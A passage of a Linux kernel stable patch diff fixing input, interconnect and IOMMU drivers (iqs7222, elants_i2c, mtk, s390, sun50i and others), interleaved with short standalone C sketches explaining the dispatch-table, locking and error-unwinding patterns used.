++					      : sldr_setup[4 + reg_offset],
++					    NULL,
++					    &iqs7222->sl_code[sldr_index][i]);
++		fwnode_handle_put(event_node);
+ 		if (error)
+ 			return error;
+ 
+ 		if (!reg_offset)
+ 			sldr_setup[9] |= iqs7222_sl_events[i].enable;
+ 
+-		error = fwnode_property_read_u32(event_node, "linux,code",
+-						 &val);
+-		if (error) {
+-			dev_err(&client->dev, "Failed to read %s code: %d\n",
+-				fwnode_get_name(sldr_node), error);
+-			return error;
+-		}
+-
+-		iqs7222->sl_code[sldr_index][i] = val;
+-		input_set_capability(iqs7222->keypad, EV_KEY, val);
+-
+ 		if (!dev_desc->event_offset)
+ 			continue;
+ 
+@@ -2190,19 +2271,63 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	 * The following call handles a special pair of properties that shift
+ 	 * to make room for a wheel enable control in the case of IQS7222C.
+ 	 */
+-	return iqs7222_parse_props(iqs7222, &sldr_node, sldr_index,
++	return iqs7222_parse_props(iqs7222, sldr_node, sldr_index,
+ 				   IQS7222_REG_GRP_SLDR,
+ 				   dev_desc->wheel_enable ?
+ 				   IQS7222_REG_KEY_WHEEL :
+ 				   IQS7222_REG_KEY_NO_WHEEL);
+ }
+ 
++static int (*iqs7222_parse_extra[IQS7222_NUM_REG_GRPS])
++				(struct iqs7222_private *iqs7222,
++				 struct fwnode_handle *reg_grp_node,
++				 int reg_grp_index) = {
++	[IQS7222_REG_GRP_CYCLE] = iqs7222_parse_cycle,
++	[IQS7222_REG_GRP_CHAN] = iqs7222_parse_chan,
++	[IQS7222_REG_GRP_SLDR] = iqs7222_parse_sldr,
++};
++
++static int iqs7222_parse_reg_grp(struct iqs7222_private *iqs7222,
++				 enum iqs7222_reg_grp_id reg_grp,
++				 int reg_grp_index)
++{
++	struct i2c_client *client = iqs7222->client;
++	struct fwnode_handle *reg_grp_node;
++	int error;
++
++	if (iqs7222_reg_grp_names[reg_grp]) {
++		char reg_grp_name[16];
++
++		snprintf(reg_grp_name, sizeof(reg_grp_name), "%s-%d",
++			 iqs7222_reg_grp_names[reg_grp], reg_grp_index);
++
++		reg_grp_node = device_get_named_child_node(&client->dev,
++							   reg_grp_name);
++	} else {
++		reg_grp_node = fwnode_handle_get(dev_fwnode(&client->dev));
++	}
++
++	if (!reg_grp_node)
++		return 0;
++
++	error = iqs7222_parse_props(iqs7222, reg_grp_node, reg_grp_index,
++				    reg_grp, IQS7222_REG_KEY_NONE);
++
++	if (!error && iqs7222_parse_extra[reg_grp])
++		error = iqs7222_parse_extra[reg_grp](iqs7222, reg_grp_node,
++						     reg_grp_index);
++
++	fwnode_handle_put(reg_grp_node);
++
++	return error;
++}
++
+ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	const struct iqs7222_reg_grp_desc *reg_grps = dev_desc->reg_grps;
+ 	u16 *sys_setup = iqs7222->sys_setup;
+-	int error, i;
++	int error, i, j;
+ 
+ 	if (dev_desc->allow_offset)
+ 		sys_setup[dev_desc->allow_offset] = U16_MAX;
+@@ -2210,32 +2335,13 @@ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ 	if (dev_desc->event_offset)
+ 		sys_setup[dev_desc->event_offset] = IQS7222_EVENT_MASK_ATI;
+ 
+-	for (i = 0; i < reg_grps[IQS7222_REG_GRP_CYCLE].num_row; i++) {
+-		error = iqs7222_parse_cycle(iqs7222, i);
+-		if (error)
+-			return error;
+-	}
+-
+-	error = iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_GLBL,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+ 	for (i = 0; i < reg_grps[IQS7222_REG_GRP_GPIO].num_row; i++) {
+-		struct fwnode_handle *gpio_node = NULL;
+ 		u16 *gpio_setup = iqs7222->gpio_setup[i];
+-		int j;
+ 
+ 		gpio_setup[0] &= ~IQS7222_GPIO_SETUP_0_GPIO_EN;
+ 		gpio_setup[1] = 0;
+ 		gpio_setup[2] = 0;
+ 
+-		error = iqs7222_parse_props(iqs7222, &gpio_node, i,
+-					    IQS7222_REG_GRP_GPIO,
+-					    IQS7222_REG_KEY_NONE);
+-		if (error)
+-			return error;
+-
+ 		if (reg_grps[IQS7222_REG_GRP_GPIO].num_row == 1)
+ 			continue;
+ 
+@@ -2258,29 +2364,21 @@ static int iqs7222_parse_all(struct iqs7222_private *iqs7222)
+ 		chan_setup[5] = 0;
+ 	}
+ 
+-	for (i = 0; i < reg_grps[IQS7222_REG_GRP_CHAN].num_row; i++) {
+-		error = iqs7222_parse_chan(iqs7222, i);
+-		if (error)
+-			return error;
+-	}
+-
+-	error = iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_FILT,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+ 	for (i = 0; i < reg_grps[IQS7222_REG_GRP_SLDR].num_row; i++) {
+ 		u16 *sldr_setup = iqs7222->sldr_setup[i];
+ 
+ 		sldr_setup[0] &= ~IQS7222_SLDR_SETUP_0_CHAN_CNT_MASK;
++	}
+ 
+-		error = iqs7222_parse_sldr(iqs7222, i);
+-		if (error)
+-			return error;
++	for (i = 0; i < IQS7222_NUM_REG_GRPS; i++) {
++		for (j = 0; j < reg_grps[i].num_row; j++) {
++			error = iqs7222_parse_reg_grp(iqs7222, i, j);
++			if (error)
++				return error;
++		}
+ 	}
+ 
+-	return iqs7222_parse_props(iqs7222, NULL, 0, IQS7222_REG_GRP_SYS,
+-				   IQS7222_REG_KEY_NONE);
++	return 0;
+ }
+ 
+ static int iqs7222_report(struct iqs7222_private *iqs7222)
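
/*
 * The refactor above replaces open-coded per-group parsing with a table
 * of optional callbacks indexed by register-group id. The shape of that
 * dispatch, reduced to standalone C; group names and handlers here are
 * illustrative, not the iqs7222 driver's.
 */
#include <stdio.h>

enum grp { GRP_CYCLE, GRP_CHAN, GRP_SLDR, GRP_SYS, NUM_GRPS };

static int parse_cycle(int idx) { printf("cycle %d\n", idx); return 0; }
static int parse_chan(int idx)  { printf("chan %d\n", idx);  return 0; }

/* Sparse table: groups without extra work simply keep a NULL slot. */
static int (*parse_extra[NUM_GRPS])(int idx) = {
	[GRP_CYCLE] = parse_cycle,
	[GRP_CHAN]  = parse_chan,
};

static int parse_reg_grp(enum grp g, int idx)
{
	/* common property parsing would happen here for every group */
	if (parse_extra[g])
		return parse_extra[g](idx);
	return 0;
}

int main(void)
{
	for (int g = 0; g < NUM_GRPS; g++)
		parse_reg_grp(g, 0);
	return 0;
}
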
+diff --git a/drivers/input/touchscreen/elants_i2c.c b/drivers/input/touchscreen/elants_i2c.c
+index 879a4d984c907..e1308e179dd6f 100644
+--- a/drivers/input/touchscreen/elants_i2c.c
++++ b/drivers/input/touchscreen/elants_i2c.c
+@@ -1329,14 +1329,12 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 	if (IS_ERR_OR_NULL(ts->reset_gpio))
+ 		return 0;
+ 
+-	gpiod_set_value_cansleep(ts->reset_gpio, 1);
+-
+ 	error = regulator_enable(ts->vcc33);
+ 	if (error) {
+ 		dev_err(&ts->client->dev,
+ 			"failed to enable vcc33 regulator: %d\n",
+ 			error);
+-		goto release_reset_gpio;
++		return error;
+ 	}
+ 
+ 	error = regulator_enable(ts->vccio);
+@@ -1345,7 +1343,7 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 			"failed to enable vccio regulator: %d\n",
+ 			error);
+ 		regulator_disable(ts->vcc33);
+-		goto release_reset_gpio;
++		return error;
+ 	}
+ 
+ 	/*
+@@ -1354,7 +1352,6 @@ static int elants_i2c_power_on(struct elants_data *ts)
+ 	 */
+ 	udelay(ELAN_POWERON_DELAY_USEC);
+ 
+-release_reset_gpio:
+ 	gpiod_set_value_cansleep(ts->reset_gpio, 0);
+ 	if (error)
+ 		return error;
+@@ -1462,7 +1459,7 @@ static int elants_i2c_probe(struct i2c_client *client)
+ 		return error;
+ 	}
+ 
+-	ts->reset_gpio = devm_gpiod_get(&client->dev, "reset", GPIOD_OUT_LOW);
++	ts->reset_gpio = devm_gpiod_get(&client->dev, "reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(ts->reset_gpio)) {
+ 		error = PTR_ERR(ts->reset_gpio);
+ 
+diff --git a/drivers/interconnect/qcom/sc7180.c b/drivers/interconnect/qcom/sc7180.c
+index 35cd448efdfbe..82d5e8a8c19ea 100644
+--- a/drivers/interconnect/qcom/sc7180.c
++++ b/drivers/interconnect/qcom/sc7180.c
+@@ -369,7 +369,7 @@ static const struct qcom_icc_desc sc7180_gem_noc = {
+ 	.num_bcms = ARRAY_SIZE(gem_noc_bcms),
+ };
+ 
+-static struct qcom_icc_bcm *mc_virt_bcms[] = {
++static struct qcom_icc_bcm * const mc_virt_bcms[] = {
+ 	&bcm_acv,
+ 	&bcm_mc0,
+ };
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 6a1f02c62dffc..9f7fab49a5a90 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -587,6 +587,7 @@ out_drop_state:
+ 	put_device_state(dev_state);
+ 
+ out:
++	pci_dev_put(pdev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/iommu/fsl_pamu.c b/drivers/iommu/fsl_pamu.c
+index 0d03f837a5d4e..7a1a413f75ab2 100644
+--- a/drivers/iommu/fsl_pamu.c
++++ b/drivers/iommu/fsl_pamu.c
+@@ -868,7 +868,7 @@ static int fsl_pamu_probe(struct platform_device *pdev)
+ 		ret = create_csd(ppaact_phys, mem_size, csd_port_id);
+ 		if (ret) {
+ 			dev_err(dev, "could not create coherence subdomain\n");
+-			return ret;
++			goto error;
+ 		}
+ 	}
+ 
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 65a3b3d886dc0..959d895fc1dff 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -283,13 +283,23 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	const struct iommu_ops *ops = dev->bus->iommu_ops;
+ 	struct iommu_device *iommu_dev;
+ 	struct iommu_group *group;
++	static DEFINE_MUTEX(iommu_probe_device_lock);
+ 	int ret;
+ 
+ 	if (!ops)
+ 		return -ENODEV;
+-
+-	if (!dev_iommu_get(dev))
+-		return -ENOMEM;
++	/*
++	 * Serialise to avoid races between IOMMU drivers registering in
++	 * parallel and/or the "replay" calls from ACPI/OF code via client
++	 * driver probe. Once the latter have been cleaned up we should
++	 * probably be able to use device_lock() here to minimise the scope,
++	 * but for now enforcing a simple global ordering is fine.
++	 */
++	mutex_lock(&iommu_probe_device_lock);
++	if (!dev_iommu_get(dev)) {
++		ret = -ENOMEM;
++		goto err_unlock;
++	}
+ 
+ 	if (!try_module_get(ops->owner)) {
+ 		ret = -EINVAL;
+@@ -309,11 +319,14 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 		ret = PTR_ERR(group);
+ 		goto out_release;
+ 	}
+-	iommu_group_put(group);
+ 
++	mutex_lock(&group->mutex);
+ 	if (group_list && !group->default_domain && list_empty(&group->entry))
+ 		list_add_tail(&group->entry, group_list);
++	mutex_unlock(&group->mutex);
++	iommu_group_put(group);
+ 
++	mutex_unlock(&iommu_probe_device_lock);
+ 	iommu_device_link(iommu_dev, dev);
+ 
+ 	return 0;
+@@ -328,6 +341,9 @@ out_module_put:
+ err_free:
+ 	dev_iommu_free(dev);
+ 
++err_unlock:
++	mutex_unlock(&iommu_probe_device_lock);
++
+ 	return ret;
+ }
+ 
+@@ -1799,11 +1815,11 @@ int bus_iommu_probe(struct bus_type *bus)
+ 		return ret;
+ 
+ 	list_for_each_entry_safe(group, next, &group_list, entry) {
++		mutex_lock(&group->mutex);
++
+ 		/* Remove item from the list */
+ 		list_del_init(&group->entry);
+ 
+-		mutex_lock(&group->mutex);
+-
+ 		/* Try to allocate default domain */
+ 		probe_alloc_default_domain(bus, group);
+ 
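
/*
 * The iommu.c hunks above serialize __iommu_probe_device() with a static
 * mutex defined inside the function. A pthread analog of that idiom as a
 * sketch: the lock has internal linkage, exists exactly once, and guards
 * only this entry point; every error path must unlock before returning,
 * as the err_unlock label in the patch does.
 */
#include <pthread.h>
#include <stdio.h>

static int probe_one(int dev)
{
	static pthread_mutex_t probe_lock = PTHREAD_MUTEX_INITIALIZER;
	int ret = 0;

	pthread_mutex_lock(&probe_lock);
	if (dev < 0) {
		ret = -1;		/* mirrors the goto err_unlock path */
		goto out_unlock;
	}
	printf("probed %d\n", dev);	/* formerly racy work, now serialized */
out_unlock:
	pthread_mutex_unlock(&probe_lock);
	return ret;
}

int main(void)
{
	probe_one(1);
	probe_one(-1);
	return 0;
}
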
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2ab2ecfe01f80..dad2f238ffbf2 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1044,20 +1044,24 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 				  struct mtk_iommu_data *data)
+ {
+ 	struct device_node *larbnode, *smicomm_node, *smi_subcomm_node;
+-	struct platform_device *plarbdev;
++	struct platform_device *plarbdev, *pcommdev;
+ 	struct device_link *link;
+ 	int i, larb_nr, ret;
+ 
+ 	larb_nr = of_count_phandle_with_args(dev->of_node, "mediatek,larbs", NULL);
+ 	if (larb_nr < 0)
+ 		return larb_nr;
++	if (larb_nr == 0 || larb_nr > MTK_LARB_NR_MAX)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < larb_nr; i++) {
+ 		u32 id;
+ 
+ 		larbnode = of_parse_phandle(dev->of_node, "mediatek,larbs", i);
+-		if (!larbnode)
+-			return -EINVAL;
++		if (!larbnode) {
++			ret = -EINVAL;
++			goto err_larbdev_put;
++		}
+ 
+ 		if (!of_device_is_available(larbnode)) {
+ 			of_node_put(larbnode);
+@@ -1067,20 +1071,32 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 		ret = of_property_read_u32(larbnode, "mediatek,larb-id", &id);
+ 		if (ret)/* The id is consecutive if there is no this property */
+ 			id = i;
++		if (id >= MTK_LARB_NR_MAX) {
++			of_node_put(larbnode);
++			ret = -EINVAL;
++			goto err_larbdev_put;
++		}
+ 
+ 		plarbdev = of_find_device_by_node(larbnode);
++		of_node_put(larbnode);
+ 		if (!plarbdev) {
+-			of_node_put(larbnode);
+-			return -ENODEV;
++			ret = -ENODEV;
++			goto err_larbdev_put;
+ 		}
+-		if (!plarbdev->dev.driver) {
+-			of_node_put(larbnode);
+-			return -EPROBE_DEFER;
++		if (data->larb_imu[id].dev) {
++			platform_device_put(plarbdev);
++			ret = -EEXIST;
++			goto err_larbdev_put;
+ 		}
+ 		data->larb_imu[id].dev = &plarbdev->dev;
+ 
+-		component_match_add_release(dev, match, component_release_of,
+-					    component_compare_of, larbnode);
++		if (!plarbdev->dev.driver) {
++			ret = -EPROBE_DEFER;
++			goto err_larbdev_put;
++		}
++
++		component_match_add(dev, match, component_compare_dev, &plarbdev->dev);
++		platform_device_put(plarbdev);
+ 	}
+ 
+ 	/* Get smi-(sub)-common dev from the last larb. */
+@@ -1098,17 +1114,28 @@ static int mtk_iommu_mm_dts_parse(struct device *dev, struct component_match **m
+ 	else
+ 		smicomm_node = smi_subcomm_node;
+ 
+-	plarbdev = of_find_device_by_node(smicomm_node);
++	pcommdev = of_find_device_by_node(smicomm_node);
+ 	of_node_put(smicomm_node);
+-	data->smicomm_dev = &plarbdev->dev;
++	if (!pcommdev)
++		return -ENODEV;
++	data->smicomm_dev = &pcommdev->dev;
+ 
+ 	link = device_link_add(data->smicomm_dev, dev,
+ 			       DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME);
++	platform_device_put(pcommdev);
+ 	if (!link) {
+ 		dev_err(dev, "Unable to link %s.\n", dev_name(data->smicomm_dev));
+ 		return -EINVAL;
+ 	}
+ 	return 0;
++
++err_larbdev_put:
++	for (i = MTK_LARB_NR_MAX - 1; i >= 0; i--) {
++		if (!data->larb_imu[i].dev)
++			continue;
++		put_device(data->larb_imu[i].dev);
++	}
++	return ret;
+ }
+ 
+ static int mtk_iommu_probe(struct platform_device *pdev)
+@@ -1173,6 +1200,8 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 
+ 	banks_num = data->plat_data->banks_num;
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!res)
++		return -EINVAL;
+ 	if (resource_size(res) < banks_num * MTK_IOMMU_BANK_SZ) {
+ 		dev_err(dev, "banknr %d. res %pR is not enough.\n", banks_num, res);
+ 		return -EINVAL;
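
/*
 * The mtk_iommu hunks above make every failure in the larb loop jump to
 * err_larbdev_put, which walks the whole table and drops any reference
 * already taken. The same unwind pattern in standalone C as a sketch,
 * with a simple counter standing in for get_device()/put_device().
 */
#include <stdio.h>

#define MAX_DEVS 4

static int refs[MAX_DEVS];

static int get_dev(int i)  { refs[i]++; return 0; }
static void put_dev(int i) { refs[i]--; }

static int acquire_all(int fail_at)
{
	int i;

	for (i = 0; i < MAX_DEVS; i++) {
		if (i == fail_at)
			goto err_put;	/* mid-loop failure */
		get_dev(i);
	}
	return 0;

err_put:
	for (i = MAX_DEVS - 1; i >= 0; i--)
		if (refs[i])
			put_dev(i);	/* drop only what was taken */
	return -1;
}

int main(void)
{
	acquire_all(2);
	for (int i = 0; i < MAX_DEVS; i++)
		printf("ref[%d]=%d\n", i, refs[i]);  /* all back to 0 */
	return 0;
}
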
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index a3fc59b814ab5..a68eadd64f38d 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -280,19 +280,17 @@ static u32 rk_mk_pte(phys_addr_t page, int prot)
+  *  11:9 - Page address bit 34:32
+  *   8:4 - Page address bit 39:35
+  *     3 - Security
+- *     2 - Readable
+- *     1 - Writable
++ *     2 - Writable
++ *     1 - Readable
+  *     0 - 1 if Page @ Page address is valid
+  */
+-#define RK_PTE_PAGE_READABLE_V2      BIT(2)
+-#define RK_PTE_PAGE_WRITABLE_V2      BIT(1)
+ 
+ static u32 rk_mk_pte_v2(phys_addr_t page, int prot)
+ {
+ 	u32 flags = 0;
+ 
+-	flags |= (prot & IOMMU_READ) ? RK_PTE_PAGE_READABLE_V2 : 0;
+-	flags |= (prot & IOMMU_WRITE) ? RK_PTE_PAGE_WRITABLE_V2 : 0;
++	flags |= (prot & IOMMU_READ) ? RK_PTE_PAGE_READABLE : 0;
++	flags |= (prot & IOMMU_WRITE) ? RK_PTE_PAGE_WRITABLE : 0;
+ 
+ 	return rk_mk_dte_v2(page) | flags;
+ }
+diff --git a/drivers/iommu/s390-iommu.c b/drivers/iommu/s390-iommu.c
+index 3c071782f6f16..c2e5e81d609e1 100644
+--- a/drivers/iommu/s390-iommu.c
++++ b/drivers/iommu/s390-iommu.c
+@@ -79,10 +79,36 @@ static void s390_domain_free(struct iommu_domain *domain)
+ {
+ 	struct s390_domain *s390_domain = to_s390_domain(domain);
+ 
++	WARN_ON(!list_empty(&s390_domain->devices));
+ 	dma_cleanup_tables(s390_domain->dma_table);
+ 	kfree(s390_domain);
+ }
+ 
++static void __s390_iommu_detach_device(struct zpci_dev *zdev)
++{
++	struct s390_domain *s390_domain = zdev->s390_domain;
++	struct s390_domain_device *domain_device, *tmp;
++	unsigned long flags;
++
++	if (!s390_domain)
++		return;
++
++	spin_lock_irqsave(&s390_domain->list_lock, flags);
++	list_for_each_entry_safe(domain_device, tmp, &s390_domain->devices,
++				 list) {
++		if (domain_device->zdev == zdev) {
++			list_del(&domain_device->list);
++			kfree(domain_device);
++			break;
++		}
++	}
++	spin_unlock_irqrestore(&s390_domain->list_lock, flags);
++
++	zpci_unregister_ioat(zdev, 0);
++	zdev->s390_domain = NULL;
++	zdev->dma_table = NULL;
++}
++
+ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 				    struct device *dev)
+ {
+@@ -90,7 +116,7 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+ 	struct s390_domain_device *domain_device;
+ 	unsigned long flags;
+-	int cc, rc;
++	int cc, rc = 0;
+ 
+ 	if (!zdev)
+ 		return -ENODEV;
+@@ -99,24 +125,18 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	if (!domain_device)
+ 		return -ENOMEM;
+ 
+-	if (zdev->dma_table && !zdev->s390_domain) {
+-		cc = zpci_dma_exit_device(zdev);
+-		if (cc) {
+-			rc = -EIO;
+-			goto out_free;
+-		}
+-	}
+-
+ 	if (zdev->s390_domain)
+-		zpci_unregister_ioat(zdev, 0);
++		__s390_iommu_detach_device(zdev);
++	else if (zdev->dma_table)
++		zpci_dma_exit_device(zdev);
+ 
+-	zdev->dma_table = s390_domain->dma_table;
+ 	cc = zpci_register_ioat(zdev, 0, zdev->start_dma, zdev->end_dma,
+-				virt_to_phys(zdev->dma_table));
++				virt_to_phys(s390_domain->dma_table));
+ 	if (cc) {
+ 		rc = -EIO;
+-		goto out_restore;
++		goto out_free;
+ 	}
++	zdev->dma_table = s390_domain->dma_table;
+ 
+ 	spin_lock_irqsave(&s390_domain->list_lock, flags);
+ 	/* First device defines the DMA range limits */
+@@ -127,9 +147,9 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 	/* Allow only devices with identical DMA range limits */
+ 	} else if (domain->geometry.aperture_start != zdev->start_dma ||
+ 		   domain->geometry.aperture_end != zdev->end_dma) {
+-		rc = -EINVAL;
+ 		spin_unlock_irqrestore(&s390_domain->list_lock, flags);
+-		goto out_restore;
++		rc = -EINVAL;
++		goto out_unregister;
+ 	}
+ 	domain_device->zdev = zdev;
+ 	zdev->s390_domain = s390_domain;
+@@ -138,14 +158,9 @@ static int s390_iommu_attach_device(struct iommu_domain *domain,
+ 
+ 	return 0;
+ 
+-out_restore:
+-	if (!zdev->s390_domain) {
+-		zpci_dma_init_device(zdev);
+-	} else {
+-		zdev->dma_table = zdev->s390_domain->dma_table;
+-		zpci_register_ioat(zdev, 0, zdev->start_dma, zdev->end_dma,
+-				   virt_to_phys(zdev->dma_table));
+-	}
++out_unregister:
++	zpci_unregister_ioat(zdev, 0);
++	zdev->dma_table = NULL;
+ out_free:
+ 	kfree(domain_device);
+ 
+@@ -155,32 +170,12 @@ out_free:
+ static void s390_iommu_detach_device(struct iommu_domain *domain,
+ 				     struct device *dev)
+ {
+-	struct s390_domain *s390_domain = to_s390_domain(domain);
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+-	struct s390_domain_device *domain_device, *tmp;
+-	unsigned long flags;
+-	int found = 0;
+ 
+-	if (!zdev)
+-		return;
++	WARN_ON(zdev->s390_domain != to_s390_domain(domain));
+ 
+-	spin_lock_irqsave(&s390_domain->list_lock, flags);
+-	list_for_each_entry_safe(domain_device, tmp, &s390_domain->devices,
+-				 list) {
+-		if (domain_device->zdev == zdev) {
+-			list_del(&domain_device->list);
+-			kfree(domain_device);
+-			found = 1;
+-			break;
+-		}
+-	}
+-	spin_unlock_irqrestore(&s390_domain->list_lock, flags);
+-
+-	if (found && (zdev->s390_domain == s390_domain)) {
+-		zdev->s390_domain = NULL;
+-		zpci_unregister_ioat(zdev, 0);
+-		zpci_dma_init_device(zdev);
+-	}
++	__s390_iommu_detach_device(zdev);
++	zpci_dma_init_device(zdev);
+ }
+ 
+ static struct iommu_device *s390_iommu_probe_device(struct device *dev)
+@@ -198,24 +193,13 @@ static struct iommu_device *s390_iommu_probe_device(struct device *dev)
+ static void s390_iommu_release_device(struct device *dev)
+ {
+ 	struct zpci_dev *zdev = to_zpci_dev(dev);
+-	struct iommu_domain *domain;
+ 
+ 	/*
+-	 * This is a workaround for a scenario where the IOMMU API common code
+-	 * "forgets" to call the detach_dev callback: After binding a device
+-	 * to vfio-pci and completing the VFIO_SET_IOMMU ioctl (which triggers
+-	 * the attach_dev), removing the device via
+-	 * "echo 1 > /sys/bus/pci/devices/.../remove" won't trigger detach_dev,
+-	 * only release_device will be called via the BUS_NOTIFY_REMOVED_DEVICE
+-	 * notifier.
+-	 *
+-	 * So let's call detach_dev from here if it hasn't been called before.
++	 * release_device is expected to detach any domain currently attached
++	 * to the device, but keep it attached to other devices in the group.
+ 	 */
+-	if (zdev && zdev->s390_domain) {
+-		domain = iommu_get_domain_for_dev(dev);
+-		if (domain)
+-			s390_iommu_detach_device(domain, dev);
+-	}
++	if (zdev)
++		__s390_iommu_detach_device(zdev);
+ }
+ 
+ static int s390_iommu_update_trans(struct s390_domain *s390_domain,
+diff --git a/drivers/iommu/sun50i-iommu.c b/drivers/iommu/sun50i-iommu.c
+index cd9b74ee24def..5b585eace3d46 100644
+--- a/drivers/iommu/sun50i-iommu.c
++++ b/drivers/iommu/sun50i-iommu.c
+@@ -27,6 +27,7 @@
+ #include <linux/types.h>
+ 
+ #define IOMMU_RESET_REG			0x010
++#define IOMMU_RESET_RELEASE_ALL			0xffffffff
+ #define IOMMU_ENABLE_REG		0x020
+ #define IOMMU_ENABLE_ENABLE			BIT(0)
+ 
+@@ -92,6 +93,8 @@
+ #define NUM_PT_ENTRIES			256
+ #define PT_SIZE				(NUM_PT_ENTRIES * PT_ENTRY_SIZE)
+ 
++#define SPAGE_SIZE			4096
++
+ struct sun50i_iommu {
+ 	struct iommu_device iommu;
+ 
+@@ -270,7 +273,7 @@ static u32 sun50i_mk_pte(phys_addr_t page, int prot)
+ 	enum sun50i_iommu_aci aci;
+ 	u32 flags = 0;
+ 
+-	if (prot & (IOMMU_READ | IOMMU_WRITE))
++	if ((prot & (IOMMU_READ | IOMMU_WRITE)) == (IOMMU_READ | IOMMU_WRITE))
+ 		aci = SUN50I_IOMMU_ACI_RD_WR;
+ 	else if (prot & IOMMU_READ)
+ 		aci = SUN50I_IOMMU_ACI_RD;
+@@ -294,6 +297,62 @@ static void sun50i_table_flush(struct sun50i_iommu_domain *sun50i_domain,
+ 	dma_sync_single_for_device(iommu->dev, dma, size, DMA_TO_DEVICE);
+ }
+ 
++static void sun50i_iommu_zap_iova(struct sun50i_iommu *iommu,
++				  unsigned long iova)
++{
++	u32 reg;
++	int ret;
++
++	iommu_write(iommu, IOMMU_TLB_IVLD_ADDR_REG, iova);
++	iommu_write(iommu, IOMMU_TLB_IVLD_ADDR_MASK_REG, GENMASK(31, 12));
++	iommu_write(iommu, IOMMU_TLB_IVLD_ENABLE_REG,
++		    IOMMU_TLB_IVLD_ENABLE_ENABLE);
++
++	ret = readl_poll_timeout_atomic(iommu->base + IOMMU_TLB_IVLD_ENABLE_REG,
++					reg, !reg, 1, 2000);
++	if (ret)
++		dev_warn(iommu->dev, "TLB invalidation timed out!\n");
++}
++
++static void sun50i_iommu_zap_ptw_cache(struct sun50i_iommu *iommu,
++				       unsigned long iova)
++{
++	u32 reg;
++	int ret;
++
++	iommu_write(iommu, IOMMU_PC_IVLD_ADDR_REG, iova);
++	iommu_write(iommu, IOMMU_PC_IVLD_ENABLE_REG,
++		    IOMMU_PC_IVLD_ENABLE_ENABLE);
++
++	ret = readl_poll_timeout_atomic(iommu->base + IOMMU_PC_IVLD_ENABLE_REG,
++					reg, !reg, 1, 2000);
++	if (ret)
++		dev_warn(iommu->dev, "PTW cache invalidation timed out!\n");
++}
++
++static void sun50i_iommu_zap_range(struct sun50i_iommu *iommu,
++				   unsigned long iova, size_t size)
++{
++	assert_spin_locked(&iommu->iommu_lock);
++
++	iommu_write(iommu, IOMMU_AUTO_GATING_REG, 0);
++
++	sun50i_iommu_zap_iova(iommu, iova);
++	sun50i_iommu_zap_iova(iommu, iova + SPAGE_SIZE);
++	if (size > SPAGE_SIZE) {
++		sun50i_iommu_zap_iova(iommu, iova + size);
++		sun50i_iommu_zap_iova(iommu, iova + size + SPAGE_SIZE);
++	}
++	sun50i_iommu_zap_ptw_cache(iommu, iova);
++	sun50i_iommu_zap_ptw_cache(iommu, iova + SZ_1M);
++	if (size > SZ_1M) {
++		sun50i_iommu_zap_ptw_cache(iommu, iova + size);
++		sun50i_iommu_zap_ptw_cache(iommu, iova + size + SZ_1M);
++	}
++
++	iommu_write(iommu, IOMMU_AUTO_GATING_REG, IOMMU_AUTO_GATING_ENABLE);
++}
++
+ static int sun50i_iommu_flush_all_tlb(struct sun50i_iommu *iommu)
+ {
+ 	u32 reg;
+@@ -343,6 +402,18 @@ static void sun50i_iommu_flush_iotlb_all(struct iommu_domain *domain)
+ 	spin_unlock_irqrestore(&iommu->iommu_lock, flags);
+ }
+ 
++static void sun50i_iommu_iotlb_sync_map(struct iommu_domain *domain,
++					unsigned long iova, size_t size)
++{
++	struct sun50i_iommu_domain *sun50i_domain = to_sun50i_domain(domain);
++	struct sun50i_iommu *iommu = sun50i_domain->iommu;
++	unsigned long flags;
++
++	spin_lock_irqsave(&iommu->iommu_lock, flags);
++	sun50i_iommu_zap_range(iommu, iova, size);
++	spin_unlock_irqrestore(&iommu->iommu_lock, flags);
++}
++
+ static void sun50i_iommu_iotlb_sync(struct iommu_domain *domain,
+ 				    struct iommu_iotlb_gather *gather)
+ {
+@@ -511,7 +582,7 @@ static u32 *sun50i_dte_get_page_table(struct sun50i_iommu_domain *sun50i_domain,
+ 		sun50i_iommu_free_page_table(iommu, drop_pt);
+ 	}
+ 
+-	sun50i_table_flush(sun50i_domain, page_table, PT_SIZE);
++	sun50i_table_flush(sun50i_domain, page_table, NUM_PT_ENTRIES);
